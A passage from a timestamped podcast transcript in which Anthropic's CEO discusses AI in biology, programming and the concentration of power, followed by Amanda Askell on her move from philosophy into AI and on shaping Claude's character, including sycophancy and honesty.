02:27:49.340 | a thousand and they're, they're, they're smarter than you are, by the way.
02:27:52.300 | Then I think at some point it'll flip around where the, you know, the AI systems will,
02:27:57.660 | you know, will, will be the PIs, will be the leaders and, and, and, you know, they'll be,
02:28:01.420 | they'll be ordering humans or other AI systems around.
02:28:04.540 | So I think that's how it'll work on the research side.
02:28:06.460 | And they would be the inventors of a CRISPR type technology.
02:28:08.780 | They would be the inventors of, of a CRISPR type technology.
02:28:12.220 | And then I think, you know, as I say in the essay, we'll want to turn, turn, probably
02:28:17.660 | turning loose is the wrong, the wrong term, but we'll want to, we'll want to harness the
02:28:22.300 | AI systems to improve the clinical trial system as well.
02:28:26.940 | There's some amount of this that's regulatory, that's a matter of societal decisions and
02:28:30.860 | that'll be harder, but can we get better at predicting the results of clinical trials?
02:28:36.300 | Can we get better at statistical design so that what, you know, clinical trials that
02:28:41.340 | used to require, you know, 5,000 people and therefore, you know, needed a hundred million
02:28:46.460 | dollars in a year to enroll them, now they need 500 people in two months to enroll them.
02:28:51.500 | That's where we should start.
02:28:53.500 | And, you know, can we increase the success rate of clinical trials by doing things in
02:28:59.740 | animal trials that we used to do in clinical trials and doing things in simulations that
02:29:03.260 | we used to do in animal trials?
02:29:04.540 | Again, we won't be able to simulate it all, AI is not God, but, you know, can we shift
02:29:11.180 | the curve substantially and radically?
02:29:13.580 | So, I don't know, that would be my picture.
02:29:15.660 | Doing it in vitro and doing it, I mean, you're still slowed down, it still takes time, but
02:29:20.300 | you can do it much, much faster.
02:29:21.420 | Yeah, yeah, yeah.
02:29:22.060 | Can we just one step at a time and can that add up to a lot of steps?
02:29:26.620 | Even though we still need clinical trials, even though we still need laws, even though
02:29:31.340 | the FDA and other organizations will still not be perfect, can we just move everything
02:29:35.420 | in a positive direction?
02:29:36.700 | And when you add up all those positive directions, do you get everything that was going to happen
02:29:40.940 | from here to 2100 instead happens from 2027 to 2032 or something?
02:29:45.900 | Another way that I think the world might be changing with AI, even today, but moving towards
02:29:53.420 | this future of the powerful, super useful AI, is programming.
02:29:58.380 | So, how do you see the nature of programming?
02:30:02.220 | Because it's so intimate to the actual act of building AI, how do you see that changing
02:30:06.860 | for us humans?
02:30:08.380 | I think that's going to be one of the areas that changes fastest for two reasons.
02:30:12.860 | One, programming is a skill that's very close to the actual building of the AI.
02:30:17.900 | So, the farther a skill is from the people who are building the AI, the longer it's going
02:30:24.380 | to take to get disrupted by the AI, right?
02:30:26.620 | Like, I truly believe that AI will disrupt agriculture.
02:30:29.980 | Maybe it already has in some ways, but that's just very distant from the folks who are building
02:30:35.100 | And so, I think it's going to take longer.
02:30:36.780 | But programming is the bread and butter of a large fraction of the employees who work
02:30:41.340 | at Anthropic and at the other companies.
02:30:43.500 | And so, it's going to happen fast.
02:30:45.420 | The other reason it's going to happen fast is with programming, you close the loop.
02:30:48.860 | Both when you're training the model and when you're applying the model, the idea that the
02:30:52.940 | model can write the code means that the model can then run the code and then see the results
02:30:58.940 | and interpret it back.
02:31:00.220 | And so, it really has an ability, unlike hardware, unlike biology, which we just discussed, the
02:31:05.980 | model has an ability to close the loop.
02:31:07.740 | And so, I think those two things are going to lead to the model getting good at programming
02:31:12.940 | very fast.
02:31:14.060 | As I saw on typical real-world programming tasks, models have gone from 3% in January
02:31:21.580 | of this year to 50% in October of this year.
02:31:25.340 | So, we're on that S-curve where it's going to start slowing down soon because you can
02:31:30.060 | only get to 100%.
02:31:30.860 | But I would guess that in another 10 months, we'll probably get pretty close.
02:31:36.940 | We'll be at least 90%.
02:31:38.140 | So again, I would guess, I don't know how long it'll take, but I would guess again,
02:31:43.580 | 2026, 2027, Twitter people who crop out these numbers and get rid of the caveats, like,
02:31:52.060 | I don't know, I don't like you, go away.
02:31:54.620 | I would guess that the kind of task that the vast majority of coders do, AI can probably,
02:32:02.620 | if we make the task very narrow, like just write code, AI systems will be able to do
02:32:10.780 | that.
02:32:11.020 | Now that said, I think comparative advantage is powerful.
02:32:13.900 | We'll find that when AIs can do 80% of a coder's job, including most of it that's
02:32:19.980 | literally like write code with a given spec, we'll find that the remaining parts of the
02:32:24.380 | job become more leveraged for humans, right?
02:32:27.020 | Humans will, they'll be more about like high-level system design or looking at the app and like,
02:32:33.740 | is it architected well?
02:32:35.260 | And the design and UX aspects, and eventually AI will be able to do those as well, right?
02:32:40.860 | That's my vision of the powerful AI system.
02:32:43.980 | But I think for much longer than we might expect, we will see that small parts of the
02:32:52.620 | job that humans still do will expand to fill their entire job in order for the overall
02:32:57.740 | productivity to go up.
02:32:58.860 | That's something we've seen.
02:33:00.860 | You know, it used to be that, you know, writing and editing letters was very difficult and
02:33:06.220 | like writing the print was difficult.
02:33:07.500 | Well, as soon as you had word processors and then computers and it became easy to produce
02:33:14.060 | work and easy to share it, then that became instant and all the focus was on the ideas.
02:33:19.580 | So this logic of comparative advantage that expands tiny parts of the tasks to large parts
02:33:26.620 | of the tasks and creates new tasks in order to expand productivity, I think that's going
02:33:31.340 | to be the case.
02:33:31.980 | Again, someday AI will be better at everything and that logic won't apply.
02:33:36.140 | And then we all have, you know, humanity will have to think about how to collectively deal
02:33:41.500 | with that.
02:33:41.900 | And we're thinking about that every day.
02:33:43.580 | And, you know, that's another one of the grand problems to deal with aside from misuse and
02:33:48.620 | autonomy.
02:33:49.180 | And, you know, we should take it very seriously.
02:33:51.260 | But I think in the near term and maybe even in the medium term, like medium term, like
02:33:55.820 | two, three, four years, you know, I expect that humans will continue to have a huge role
02:34:00.940 | and the nature of programming will change.
02:34:02.540 | But programming as a role, programming as a job will not change.
02:34:05.900 | It'll just be less writing things line by line and it'll be more macroscopic.
02:34:09.980 | And I wonder what the future of IDEs looks like.
02:34:12.780 | So the tooling of interacting with AI systems, this is true for programming and also probably
02:34:16.860 | true for in other contexts, like computer use, but maybe domain specific, like we mentioned
02:34:21.740 | biology, it probably needs its own tooling about how to be effective.
02:34:25.500 | And then programming needs its own tooling.
02:34:27.820 | Is Anthropic going to play in that space of also tooling potentially?
02:34:30.700 | I'm absolutely convinced that powerful IDEs, that there's so much low hanging fruit to
02:34:39.420 | be grabbed there that, you know, right now it's just like you talk to the model and it
02:34:43.660 | talks back.
02:34:44.300 | But, but look, I mean, IDEs are great at kind of lots of static analysis of, you know, so
02:34:52.220 | much as possible with kind of static analysis, like many bugs you can find without even writing
02:34:57.340 | the code.
02:34:58.300 | Then, you know, IDEs are good for running particular things, organizing your code, measuring
02:35:04.540 | coverage of unit tests.
02:35:05.660 | Like there's so much that's been possible with a normal, with a normal IDEs.
02:35:10.220 | Now you add something like, well, the model now, you know, the model can now like write
02:35:15.900 | code and run code.
02:35:17.420 | Like, I am absolutely convinced that over the next year or two, even if the quality
02:35:21.580 | of the models didn't improve, that there would be enormous opportunity to enhance people's
02:35:26.140 | productivity by catching a bunch of mistakes, doing a bunch of grunt work for people, and
02:35:31.180 | that we haven't even scratched the surface.
02:35:33.020 | Anthropic itself, I mean, you can't say, you know, no, you know, it's hard to say what
02:35:38.860 | will happen in the future.
02:35:40.220 | Currently, we're not trying to make such IDEs ourselves.
02:35:43.340 | Rather, we're powering the companies like Cursor or like Cognition or some of the other,
02:35:49.260 | you know, Expo in the security space, you know, others that I can mention as well that
02:35:56.860 | are building such things themselves on top of our API.
02:35:59.500 | And our view has been, let a thousand flowers bloom.
02:36:02.860 | We don't internally have the, you know, the resources to try all these different things.
02:36:09.020 | Let's let our customers try it.
02:36:10.460 | And, you know, we'll see who succeeds and maybe different customers will succeed in
02:36:14.700 | different ways.
02:36:16.220 | So I both think this is super promising.
02:36:18.540 | And, you know, it's not, it's not, it's not something, you know, Anthropic isn't, isn't
02:36:23.020 | eager to, at least right now, compete with all our companies in this space and maybe
02:36:26.860 | never.
02:36:27.420 | Yeah.
02:36:27.580 | It's been interesting to watch Cursor try to integrate Cloud successfully because there's,
02:36:30.860 | it's actually, I mean, fascinating how many places it can help the programming experience.
02:36:35.740 | It's not as trivial.
02:36:36.540 | It is, it is really astounding.
02:36:38.300 | I feel like, you know, as a CEO, I don't get to program that much.
02:36:41.100 | And I feel like if six months from now I go back, it'll be completely unrecognizable to
02:36:45.340 | Exactly.
02:36:45.820 | Um, so in this world with super powerful AI, uh, that's increasingly automated, what's
02:36:52.700 | the source of meaning for us humans?
02:36:54.860 | You know, work is a source of deep meaning for many of us.
02:36:58.540 | So what do we, uh, where do we find the meaning?
02:37:01.180 | This is something that I've, I've written about a little bit in the essay, although
02:37:04.860 | I, I actually, I give it a bit short shrift, not for any, um, not for any principled reason,
02:37:09.980 | but this essay, if you believe it was originally going to be two or three pages, I was going
02:37:14.700 | to talk about it at all hands.
02:37:16.140 | And the reason I, I, I realized it was an under, uh, uh, important underexplored topic
02:37:21.500 | is that I just kept writing things and I was just like, oh man, I can't do this justice.
02:37:25.660 | And so the thing ballooned to like 40 or 50 pages.
02:37:28.460 | And then when I got to the work and meaning section, I'm like, oh man, this isn't going
02:37:31.100 | to be a hundred pages.
02:37:31.980 | Like, I'm going to have to write a whole other essay about that.
02:37:34.700 | But meaning is actually interesting because you think about like the life that someone
02:37:39.180 | lives or something, or like, you know, like, you know, let's say you were to put me in,
02:37:42.620 | like, I don't know, like a simulated environment or something where like, um, you know, like
02:37:46.940 | I have a job and I'm trying to accomplish things and I don't know, I like do that for
02:37:50.940 | 60 years.
02:37:51.660 | And then, then you're like, oh, oh, like, oops, this was, this was actually all a game.
02:37:55.500 | Right.
02:37:55.820 | Does that really kind of rob you of the meaning of the whole thing?
02:37:58.380 | You know, like I still made important choices, including moral choices.
02:38:02.140 | I still sacrificed.
02:38:03.660 | I still had to kind of gain all these skills or, or, or just like a similar exercise, you
02:38:08.620 | know, think back to like, you know, one of the historical figures who, you know, discovered
02:38:12.300 | electromagnetism or relativity or something, if you told them, well, actually 20,000 years
02:38:17.820 | ago, some, some alien on, you know, some alien on this planet discovered this before, before
02:38:23.180 | you did, um, does that, does that rob the meaning of the discovery?
02:38:26.460 | It, it doesn't really seem like it to me.
02:38:28.780 | Right.
02:38:29.100 | It seems like the process is what, is what matters and how it shows who you are as a
02:38:33.900 | person along the way and, you know, how you relate to other people and like the decisions
02:38:38.460 | that you make along the way.
02:38:40.060 | Those are, those are consequential.
02:38:41.980 | Um, you know, I, I could imagine if we handle things badly in an AI world, we could set
02:38:47.260 | things up where people don't have any long-term source of meaning or any, but, but that's,
02:38:52.460 | that's more a choice, a set of choices we make.
02:38:55.020 | That's more a set of the architecture of a society with these powerful models.
02:39:00.460 | If we, if we design it badly and for shallow things, then, then that might happen.
02:39:05.020 | I would also say that, you know, most people's lives today, while admirably, you know, they
02:39:10.380 | work very hard to find meaning, meaning those lives, like, look, you know, we, who are privileged
02:39:16.140 | in who are developing these technologies, we should have empathy for people, not just
02:39:20.540 | here, but in the rest of the world who, who, you know, spend a lot of their time kind of
02:39:24.860 | scraping by to, to, to, to, to like survive, assuming we can distribute the benefits of
02:39:30.460 | these technology, of this technology to everywhere, like their lives are going to get a hell of
02:39:35.420 | a lot better.
02:39:36.380 | Um, and, uh, you know, meaning will be important to them as it is important to them now, but,
02:39:41.420 | but, you know, we should not forget the importance of that.
02:39:44.140 | And, and, you know, that, that, uh, the idea of meaning as, as, as, as kind of the only
02:39:48.620 | important thing is in some ways, an artifact of, of a small subset of people who have,
02:39:53.980 | who have been, uh, economically fortunate.
02:39:56.540 | But I, you know, I think all that said, I, you know, I think a world is possible with
02:40:00.780 | powerful AI that not only has as much meaning for, for everyone, but that has, that has
02:40:07.100 | more meaning for everyone, right.
02:40:08.380 | That can, can allow, um, can allow everyone to see worlds and experiences that it was
02:40:15.100 | either possible for no one to see or, or possible for, for very few people to experience.
02:40:20.940 | Um, so I, I am optimistic about meaning.
02:40:25.100 | I worry about economics and the concentration of power.
02:40:29.500 | That's actually what I worry about more.
02:40:31.420 | Um, I, I worry about how do we make sure that that fair world reaches everyone.
02:40:37.580 | Um, when things have gone wrong for humans, they've often gone wrong because humans mistreat
02:40:42.700 | other humans.
02:40:43.740 | Uh, that, that is maybe in some ways even more than the autonomous risk of AI or the
02:40:49.180 | question of meaning that, that is the thing I worry about most, um, the, the concentration
02:40:55.420 | of power, the abuse of power, um, structures like autocracies and dictatorships where a
02:41:03.500 | small number of people exploits a large number of people.
02:41:05.980 | I'm very worried about that.
02:41:07.900 | And AI increases the amount of power in the world.
02:41:12.060 | And if you concentrate that power and abuse that power, it can do immeasurable damage.
02:41:16.860 | It's very frightening.
02:41:18.060 | It's very, it's very frightening.
02:41:19.820 | Well, I encourage people, highly encourage people to read the full essay.
02:41:23.660 | That should probably be a book or a sequence of essays, uh, because it does paint a very
02:41:29.260 | specific future.
02:41:30.140 | I could tell the later sections got shorter and shorter because you started to probably
02:41:33.980 | realize that this is going to be a very long essay.
02:41:36.460 | I, one, I realized it would be very long and two, I'm very aware of, and very much try
02:41:41.980 | to avoid, um, you know, just, just being a, I don't know, I don't know what the term for
02:41:46.380 | it is, but one, one of these people who's kind of overconfident and has an opinion on
02:41:50.300 | everything and kind of says, says a bunch of stuff and isn't, isn't an expert.
02:41:54.060 | I very much tried to avoid that, but I have to admit once I got the biology sections,
02:41:58.300 | like I wasn't an expert.
02:41:59.500 | And so as much as I expressed uncertainty, uh, probably I said some, a bunch of things
02:42:04.220 | that were embarrassing or wrong.
02:42:06.060 | Well, I was excited for the future you painted.
02:42:08.140 | And, uh, thank you so much for working hard to build that future.
02:42:11.180 | And thank you for talking to me.
02:42:12.540 | Thanks for having me.
02:42:13.500 | I just, I just hope we can get it right and, and make it real.
02:42:16.700 | And if there's one message I want to, I want to send, it's that to get all this stuff,
02:42:22.060 | right, to make it real, we, we both need to build the technology, build the, you know,
02:42:27.340 | the companies, the economy around using this technology positively, but we also need to
02:42:31.660 | address the risks because they're, they're, those risks are in our way.
02:42:35.580 | They're, they're landmines on, on the way from here to there.
02:42:38.860 | And we have to defuse those landmines if we want to get there.
02:42:41.580 | It's a balance like all things in life.
02:42:43.420 | Like all things.
02:42:44.300 | Thank you.
02:42:44.800 | Thanks for listening to this conversation with Dario Amadei.
02:42:48.140 | And now dear friends, here's Amanda Askel.
02:42:51.820 | You are a philosopher by training.
02:42:55.420 | So what sort of questions did you find fascinating through your journey in philosophy in Oxford
02:43:00.700 | and NYU, and then switching over to the AI problems at OpenAI and Anthropic?
02:43:07.580 | I think philosophy is actually a really good subject if you are kind of fascinated with
02:43:11.820 | everything.
02:43:12.320 | So, because there's a philosophy of everything, you know, so if you do philosophy of mathematics
02:43:16.860 | for a while, and then you decide that you're actually really interested in chemistry, you
02:43:19.980 | can do philosophy of chemistry for a while.
02:43:21.740 | You can move into ethics or philosophy of politics.
02:43:24.700 | I think towards the end, I was really interested in ethics primarily.
02:43:29.740 | And so that was like, what my PhD was on.
02:43:31.900 | It was on a kind of technical area of ethics, which was ethics, where worlds contain infinitely
02:43:37.020 | many people, strangely, a little bit less practical on the end of ethics.
02:43:41.340 | And then I think that one of the tricky things with doing a PhD in ethics is that you're
02:43:45.820 | thinking a lot about like the world, how it could be better problems.
02:43:49.820 | And you're doing like a PhD in philosophy.
02:43:52.940 | And I think when I was doing my PhD, I was kind of like, this is really interesting.
02:43:57.020 | It's probably one of the most fascinating questions I've ever encountered in philosophy.
02:44:00.300 | And I love it.
02:44:02.380 | But I would rather see if I can have an impact on the world and see if I can do good things.
02:44:09.740 | And I think that was around the time that AI was still probably not as widely recognized
02:44:15.660 | as it is now.
02:44:16.940 | That was around 2017, 2018.
02:44:20.060 | I had been following progress, and it seemed like it was becoming kind of a big deal.
02:44:25.180 | And I was basically just happy to get involved and see if I could help because I was like,
02:44:29.180 | well, if you try and do something impactful, if you don't succeed, you tried to do the
02:44:33.500 | impactful thing and you can go be a scholar and feel like you tried.
02:44:39.020 | And if it doesn't work out, it doesn't work out.
02:44:42.460 | And so then I went into AI policy at that point.
02:44:45.340 | And what does AI policy entail?
02:44:47.900 | At the time, this was more thinking about sort of the political impact and the ramifications
02:44:52.860 | of AI, and then I slowly moved into sort of AI evaluation, how we evaluate models, how
02:44:59.500 | they compare with like human outputs, whether people can tell like the difference between
02:45:03.660 | AI and human outputs.
02:45:04.700 | And then when I joined Anthropic, I was more interested in doing sort of technical alignment
02:45:10.460 | work and again, just seeing if I could do it and then being like, if I can't, then,
02:45:15.500 | you know, that's fine.
02:45:16.300 | I tried sort of the way I lead life, I think.
02:45:20.860 | Oh, what was that like sort of taking the leap from the philosophy of everything into
02:45:24.380 | the technical?
02:45:24.940 | I think that sometimes people do this thing that I'm like not that keen on where they'll
02:45:30.300 | be like, is this person technical or not?
02:45:32.940 | Like you're either a person who can like code and isn't scared of math or you're like
02:45:37.580 | And I think I'm maybe just more like, I think a lot of people are actually very capable
02:45:43.020 | of working these kinds of areas if they just like try it.
02:45:46.380 | And so I didn't actually find it like that bad.
02:45:49.980 | In retrospect, I'm sort of glad I wasn't speaking to people who treated it like it.
02:45:53.740 | You know, I've definitely met people who are like, well, you like learned how to code.
02:45:56.540 | And I'm like, well, I'm not like an amazing engineer.
02:45:58.700 | Like I'm surrounded by amazing engineers.
02:46:00.940 | My code's not pretty, but I enjoyed it a lot.
02:46:05.420 | And I think that in many ways, at least in the end, I think I flourished like more in
02:46:08.860 | the technical areas than I would have in the policy areas.
02:46:11.580 | Politics is messy and it's harder to find solutions to problems in the space of politics,
02:46:17.180 | like definitive, clear, provable, beautiful solutions as you can with technical problems.
02:46:25.100 | Yeah.
02:46:25.260 | And I feel like I have kind of like one or two sticks that I hit things with, you know,
02:46:30.140 | and one of them is like arguments and like, you know, so like just trying to work out
02:46:35.020 | what a solution to a problem is and then trying to convince people that that is the solution
02:46:39.820 | and be convinced if I'm wrong.
02:46:41.820 | And the other one is sort of more empiricism.
02:46:44.860 | So like just like finding results, having a hypothesis, testing it.
02:46:47.660 | And I feel like a lot of policy and politics feels like it's layers above that.
02:46:53.900 | Like somehow I don't think if I was just like, I have a solution to all of these problems.
02:46:57.260 | Here it is written down.
02:46:58.620 | If you just want to implement it, that's great.
02:47:00.460 | That feels like not how policy works.
02:47:02.300 | And so I think that's where I probably just like wouldn't have flourished is my guess.
02:47:05.500 | Sorry to go in that direction, but I think it would be pretty inspiring for people
02:47:10.060 | that are "non-technical" to see where like the incredible journey you've been on.
02:47:15.980 | So what advice would you give to people that are sort of maybe just a lot of people think
02:47:22.300 | they're underqualified, insufficiently technical to help in AI?
02:47:27.100 | Yeah, I think it depends on what they want to do.
02:47:30.220 | And in many ways, it's a little bit strange where I've, I thought it's kind of funny that
02:47:35.260 | I think I ramped up technically at a time when now I look at it and I'm like models
02:47:41.820 | are so good at assisting people with this stuff that it's probably like easier now than
02:47:47.500 | like when I was working on this.
02:47:48.700 | So part of me is like, I don't know, find a project and see if you can actually just
02:47:55.500 | carry it out is probably my best advice.
02:47:58.220 | I don't know if that's just because I'm very project based in my learning.
02:48:02.780 | Like, I don't think I learned very well from like, say courses or even from like books,
02:48:08.300 | at least when it comes to this kind of work.
02:48:09.820 | The thing I'll often try and do is just like have projects that I'm working on and implement
02:48:14.220 | them.
02:48:14.860 | And, you know, and this can include like really small, silly things.
02:48:18.220 | Like if I get slightly addicted to like word games or number games or something, I would
02:48:22.860 | just like code up a solution to them because there's some part of my brain and it just
02:48:26.380 | like completely eradicated the itch.
02:48:28.220 | You know, you're like, once you have like solved it and like you just have like a solution
02:48:31.740 | that works every time, I would then be like, cool, I can never play that game again.
02:48:34.940 | That's awesome.
02:48:35.500 | Yeah.
02:48:36.700 | There's a real joy to building like game playing engines, like board games, especially.
02:48:42.860 | Yeah.
02:48:43.180 | So pretty quick, pretty simple, especially a dumb one.
02:48:46.460 | And it's, and then you can play with it.
02:48:48.300 | Yeah.
02:48:49.020 | And then it's also just like trying things like part of me is like, if you, maybe it's
02:48:52.540 | that attitude that I like as the whole figure out what seems to be like the way that you
02:48:59.260 | could have a positive impact and then try it.
02:49:01.100 | And if you fail and you, in a way that you're like, I actually like can never succeed at
02:49:05.740 | this.
02:49:06.060 | You like know that you tried and then you go into something else and you probably learn
02:49:09.100 | a lot.
02:49:09.420 | So one of the things that you're an expert in and you do is creating and crafting Claude's
02:49:17.180 | character and personality.
02:49:18.300 | And I was told that you have probably talked to Claude more than anybody else at Anthropic,
02:49:23.900 | like literal conversations.
02:49:25.740 | I guess there's like a Slack channel where the legend goes, you just talk to it nonstop.
02:49:31.660 | So what's the goal of creating and crafting Claude's character and personality?
02:49:36.540 | It's also funny if people think that about the Slack channel, because I'm like, that's
02:49:39.900 | one of like five or six different methods that I have for talking with Claude.
02:49:43.820 | And I'm like, yes, there's a tiny percentage of how much I talk with Claude.
02:49:51.180 | I think the goal, like one thing I really like about the character work is from the
02:49:56.300 | outset, it was seen as an alignment piece of work and not something like a product consideration,
02:50:03.900 | which isn't to say I don't think it makes Claude.
02:50:07.900 | I think it actually does make Claude like enjoyable to talk with.
02:50:11.900 | At least I hope so.
02:50:14.220 | But I guess like my main thought with it has always been trying to get Claude to behave
02:50:21.100 | the way you would kind of ideally want anyone to behave if they were in Claude's position.
02:50:25.500 | So imagine that I take someone and they know that they're going to be talking with potentially
02:50:31.260 | millions of people so that what they're saying can have a huge impact.
02:50:34.380 | And you want them to behave well in this like really rich sense.
02:50:40.540 | So I think that doesn't just mean like being say ethical, though it does include that and
02:50:48.060 | not being harmful, but also being kind of nuanced, you know, like thinking through
02:50:51.580 | what a person means, trying to be charitable with them and being a good conversationalist,
02:50:57.100 | like really in this kind of like rich sort of Aristotelian notion of what it is to be
02:51:01.100 | a good person and not in this kind of like thin, like ethics as a more comprehensive
02:51:05.420 | notion of what it is to be.
02:51:06.780 | So that includes things like when should you be humorous?
02:51:08.700 | When should you be caring?
02:51:10.140 | How much should you like respect autonomy and people's like ability to form opinions
02:51:15.980 | themselves?
02:51:16.460 | And how should you do that?
02:51:18.380 | And I think that's the kind of like rich sense of character that I wanted to and still do
02:51:24.700 | want Claude to have.
02:51:25.820 | You also have to figure out when Claude should push back on an idea or argue versus.
02:51:31.500 | So you have to respect the worldview of the person that arrives to Claude, but also maybe
02:51:38.940 | help them grow if needed.
02:51:40.860 | That's a tricky balance.
02:51:42.620 | Yeah.
02:51:43.420 | There's this problem of like sycophancy in language models.
02:51:47.020 | Can you describe that?
02:51:48.140 | Yeah.
02:51:48.380 | So basically there's a concern that the model sort of wants to tell you what you want to
02:51:53.420 | hear, basically.
02:51:54.220 | And you see this sometimes.
02:51:56.300 | So I feel like if you interact with the models, so I might be like, what are three baseball
02:52:02.700 | teams in this region?
02:52:04.540 | And then Claude says, you know, baseball team one, baseball team two, baseball team three.
02:52:10.140 | And then I say something like, oh, I think baseball team three moved, didn't they?
02:52:14.300 | I don't think they're there anymore.
02:52:15.500 | And there's a sense in which like if Claude is really confident that that's not true,
02:52:19.340 | Claude should be like, I don't think so.
02:52:21.660 | Like maybe you have more up to date information.
02:52:23.340 | I think language models have this like tendency to instead, you know, be like, you're right.
02:52:30.380 | They did move.
02:52:31.420 | You know, I'm incorrect.
02:52:33.500 | I mean, there's many ways in which this could be kind of concerning.
02:52:35.980 | So like a different example is imagine someone says to the model, how do I convince my doctor
02:52:43.980 | to get me an MRI?
02:52:44.860 | There's like what the human kind of like wants, which is this like convincing argument.
02:52:50.780 | And then there's like what is good for them, which might be actually to say, hey, like
02:52:55.020 | if your doctor's suggesting that you don't need an MRI, that's a good person to listen
02:52:59.500 | to and like, it's actually really nuanced what you should do in that kind of case.
02:53:04.700 | Because you also want to be like, but if you're trying to advocate for yourself as a patient,
02:53:08.220 | here's like things that you can do.
02:53:09.420 | If you are not convinced by what your doctor's saying, it's always great to get a second
02:53:14.540 | opinion.
02:53:15.420 | Like it's actually really complex what you should do in that case.
02:53:17.660 | But I think what you don't want is for models to just like say what you want, say what they
02:53:22.380 | think you want to hear.
02:53:23.180 | And I think that's the kind of problem of sycophancy.
02:53:26.140 | So what other traits, you already mentioned a bunch, but what other that come to mind
02:53:30.940 | that are good in this Aristotelian sense for a conversationalist to have?
02:53:36.940 | Yeah, so I think like there's ones that are good for conversational like purposes.
02:53:41.980 | So, you know, asking follow up questions in the appropriate places and asking the appropriate
02:53:47.100 | kinds of questions.
02:53:48.060 | I think there are broader traits that feel like they might be more impactful.
02:53:55.740 | So one example that I guess I've touched on, but that also feels important and is the thing
02:54:02.140 | that I've worked on a lot is honesty.
02:54:04.700 | And I think this like gets to the sycophancy point.
02:54:09.100 | There's a balancing act that they have to walk, which is models currently are less capable
02:54:13.180 | than humans in a lot of areas.
02:54:14.700 | And if they push back against you too much, it can actually be kind of annoying, especially
02:54:18.140 | if you're just correct because you're like, look, I'm smarter than you on this topic.
02:54:22.300 | Like, I know more and at the same time, you don't want them to just fully defer to humans
02:54:28.780 | and to like try to be as accurate as they possibly can be about the world and to be
02:54:32.220 | consistent across contexts.
02:54:33.580 | I think there are others like when I was thinking about the character, I guess one picture that
02:54:39.820 | I had in mind is especially because these are models that are going to be talking to
02:54:43.420 | people from all over the world with lots of different political views, lots of different
02:54:47.180 | ages, and so you have to ask yourself like, what is it to be a good person in those circumstances?
02:54:53.580 | Is there a kind of person who can like travel the world, talk to many different people and
02:54:58.380 | almost everyone will come away being like, wow, that's a really good person.
02:55:02.860 | That person seems really genuine.
02:55:04.220 | And I guess like my thought there was like, I can imagine such a person and they're not
02:55:09.020 | a person who just like adopts the values of the local culture.
02:55:11.580 | And in fact, that would be kind of rude.
02:55:12.860 | I think if someone came to you and just pretended to have your values, you'd be like, that's
02:55:16.300 | kind of off-putting.
02:55:17.100 | It's someone who's like very genuine and insofar as they have opinions and values,
02:55:22.060 | they express them, they're willing to discuss things though, they're open-minded, they're
02:55:26.300 | respectful.
02:55:27.340 | And so I guess I had in mind that the person who like if we were to aspire to be the best
02:55:33.260 | person that we could be in the kind of circumstance that a model finds itself in, how would we
02:55:37.660 | And I think that's the kind of the guide to the sorts of traits that I tend to think
02:55:41.980 | about.
02:55:42.620 | Yeah, that's a beautiful framework.
02:55:44.780 | I want you to think about this like a world traveler.
02:55:47.100 | And while holding onto your opinions, you don't talk down to people, you don't think
02:55:53.820 | you're better than them because you have those opinions, that kind of thing.
02:55:56.860 | You have to be good at listening and understanding their perspective, even if it doesn't match
02:56:02.220 | your own.
02:56:02.780 | So that's a tricky balance to strike.
02:56:04.380 | So how can Claude represent multiple perspectives on a thing?
02:56:08.860 | Like, is that challenging?
02:56:11.660 | We could talk about politics.
02:56:13.100 | It's a very divisive, but there's other divisive topics on baseball teams, sports, and so on.
02:56:19.420 | How is it possible to sort of empathize with a different perspective and to be able to
02:56:24.940 | communicate clearly about the multiple perspectives?
02:56:27.980 | I think that people think about values and opinions as things that people hold sort of
02:56:34.140 | with certainty and almost like preferences of taste or something, like the way that they
02:56:39.820 | would, I don't know, prefer like chocolate to pistachio or something.
02:56:43.260 | But actually, I think about values and opinions as like a lot more like physics than I think
02:56:51.820 | most people do.
02:56:52.540 | I'm just like, these are things that we are openly investigating.
02:56:56.380 | There's some things that we're more confident in.
02:56:58.140 | We can discuss them.
02:56:59.980 | We can learn about them.
02:57:01.100 | And so I think in some ways, like it's ethics is definitely different in nature, but has
02:57:09.420 | a lot of those same kind of qualities.
02:57:10.860 | You want models in the same way you want them to understand physics.
02:57:14.380 | You kind of want them to understand all values in the world that people have and to be curious
02:57:19.580 | about them and to be interested in them and to not necessarily like pander to them or
02:57:24.140 | agree with them, because there's just lots of values where I think almost all people
02:57:27.980 | in the world, if they met someone with those values, they'd be like, that's abhorrent.
02:57:31.340 | I completely disagree.
02:57:34.380 | And so again, maybe my thought is, well, in the same way that a person can, like I think
02:57:40.940 | many people are thoughtful enough on issues of like ethics, politics, opinions that even
02:57:46.860 | if you don't agree with them, you feel very heard by them.
02:57:49.820 | They think carefully about your position.
02:57:51.740 | They think about its pros and cons.
02:57:53.180 | They maybe offer counter considerations.
02:57:55.420 | So they're not dismissive, but nor will they agree.
02:57:57.660 | You know, if they're like, actually, I just think that that's very wrong.
02:58:00.220 | They'll say that.
02:58:01.980 | I think that in Claude's position, it's a little bit trickier because you don't necessarily
02:58:07.580 | want to like, if I was in Claude's position, I wouldn't be giving a lot of opinions.
02:58:11.260 | I just wouldn't want to influence people too much.
02:58:12.860 | I'd be like, you know, I forget conversations every time they happen, but I know I'm talking
02:58:17.500 | with like potentially millions of people who might be like really listening to what I say.
02:58:22.700 | I think I would just be like, I'm less inclined to give opinions.
02:58:25.180 | I'm more inclined to like think through things or present the considerations to you or discuss
02:58:31.100 | your views with you, but I'm a little bit less inclined to like affect how you think
02:58:37.100 | because it feels much more important that you maintain like autonomy there.
02:58:41.020 | - Yeah.
02:58:42.300 | Like if you really embody intellectual humility, the desire to speak decreases quickly.
02:58:48.940 | - Yeah.
02:58:49.660 | - Okay.
02:58:50.380 | But Claude has to speak.
02:58:52.540 | So, but without being overbearing.
02:58:58.060 | - Yeah.
02:58:59.020 | - And then, but then there's a line when you're sort of discussing whether the earth is flat
02:59:03.260 | or something like that.
02:59:04.060 | I actually was, I remember a long time ago was speaking to a few high profile folks and
02:59:12.220 | they were so dismissive of the idea that the earth is flat, but like so arrogant about it.
02:59:17.820 | And I thought like, there's a lot of people that believe the earth is flat.
02:59:21.740 | That was, I don't know if that movement is there anymore.
02:59:24.140 | That was like a meme for a while.
02:59:25.340 | - Yeah.
02:59:25.900 | - But they really believed it.
02:59:27.420 | And like, well, okay.
02:59:28.620 | So I think it's really disrespectful to completely mock them.
02:59:32.140 | I think you have to understand where they're coming from.
02:59:35.660 | I think probably where they're coming from is the general skepticism of institutions,
02:59:40.060 | which is grounded in a kind of, there's a deep philosophy there, which you could understand,
02:59:45.820 | you can even agree with in parts.
02:59:48.060 | And then from there, you can use it as an opportunity to talk about physics without
